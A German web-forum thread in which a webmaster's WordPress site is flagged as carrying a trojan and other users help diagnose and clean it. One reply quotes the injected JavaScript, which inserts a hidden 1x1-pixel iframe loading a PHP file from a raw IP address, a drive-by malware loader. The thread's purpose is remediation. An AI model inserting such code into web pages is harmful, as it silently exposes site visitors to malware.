Trojan.Generic Warnung bei URL Aufruf

• Hallo zusammen,

ich betreue nebenbei eine Webseite und erhalte seit einigen Tagen eine Meldung von Kaspersky das der Zugriff auf die Seite geblockt wird weil Heuer.Trojan.Generic aufgerufen wird.
    Die Seite hab ich auf meinen Rechner gezogen und von Kaspersky und Malwarebytes checken lassen. Alles ohne Warnmeldung.

Hat jemand eine Idee um was es gehen könnte?

MfG
    Simon

• Anzeige

Hallo!

Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

• ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

Mehr erfahren

• http://www.mfcgernsheim.de ich hab eine Ahnung... wenn ich die Seite aufrufe versucht die page laut Quelltext ne IP bzw. eine esd.php zu laden... siehe unten

(function () { var r = document.createElement('iframe'); r.src = 'http://188.128.137.211/esd.php'; r.style.position = 'absolute'; r.style.border = '0'; r.style.height = '1px'; r.style.width = '1px'; r.style.left = '1px'; r.style.top = '1px'; if (!document.getElementById('r')) { document.write('<div id=\'r\'></div>'); document.getElementById('r').appendChild(r); }})();</script><div id="wrapper" class="hfeed"

wenn ich mir die IP ansehe komm ich auf irgend ne polnische Seite...

• Wundert Dich das alles? Wenn Du den Blog nicht auf den aktuellsten Stand hälst, dann darfst Du Dich nicht wundern, wenn sich Malware darauf breit macht. Du verwendest noch WordPress 3.1.3, mittlerweile sind wir bei 3.4.2!

siehe: http://sitecheck.sucuri.net/results/www.mfcgernsheim.de

Die Forensuche dürfte bei der Bewältigung des Problems behilflich sein. Suche einfach mal nach "wordpress gehacked" oder "wordpress malware".

Vor einiger Zeit hatte ich selbst mal ein ähnliches Problem und hatte die Vorgehensweise in meinem Blog niedergeschrieben. Kannst Du Dir ja mal ansehen. Aber beachte bitte: Diese Anleitung soll Dir nur als Hilfestellung für mögliche Vorgehensweisen dienen. Dein Problem kann auch ganz anders gelagert sein... Jedenfalls solltest Du im Falle einer erfolgreichen Beseitigung zunächst WP aktualisieren und vor allem die Sicherheitslücke finden.

• Hy also WP hab ich grad gepatcht und alle Plugins auf den neusten Stand gebracht. Danke erstmal für eure Antworten. Werd noch einige Daten abändern bzw. korrigieren. Hoffe mit einem Update aller Daten inkl dem Theme über das die Problematik wohl entstanden ist, löst sich mein Problem.

• Ich wollte es gerade schon sagen... Ein Update der Software entfernt noch lange nicht den Schadcode. Da ist schon ein bisschen mehr Arbeit nötig.

• Hy also WP hab ich grad gepatcht und alle Plugins auf den neusten Stand gebracht. Danke erstmal für eure Antworten. Werd noch einige Daten abändern bzw. korrigieren. Hoffe mit einem Update aller Daten inkl dem Theme über das die Problematik wohl entstanden ist, löst sich mein Problem.

du musst 1. alle alten Dateien vom Server löschen,
    dann die Datenbank checken,
    dann WP komplett neu dir holen, nich tnur das Update via Dashboard machen,
    danach die Theme Dateien checken,
    alte ungebrauchte Plugins entfernen.
    die wp-config.php am besten neu schreiben oder guggen, ob sich da was geändert hat.

es gibt Plugins die beim Auffinden helfen
    http://wordpress.org/extend/plugins/tags/malware

oder gib den Namen des Virus /Malware und WordPress in den Suchschlitz deiner bevorzugten Suchmaschine und du findest Hilfe
    aber zuerst bereinige das selbst was Du kannst :-)
    ok?

• Ok Datenbank checked,
    Komplette Seite gechecked mit malwarebyts und Kaspersky
    wp-config neu geschrieben,
    alte Daten weg,
    Plugins nicht deinstalliert/Alle gebraucht
    Seite gechecked mit
    Security Ninja Lite//

Anti-Malware (Get Off Malicious Scripts)

Malware Finder

Sucuri Sitecheck Malware Scanner

Alle Fehler versucht zu bearbeiten. Malware konnt ich aber nicht finden. Irgendwas ist da komisch. Auch den Code den sucuri mir angibt find ich in keiner Datei ( index.html,index.php usw). Bin en bissel ratlos. Gibts etwas, dass die Dateien nach diesem Code durchsucht?

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!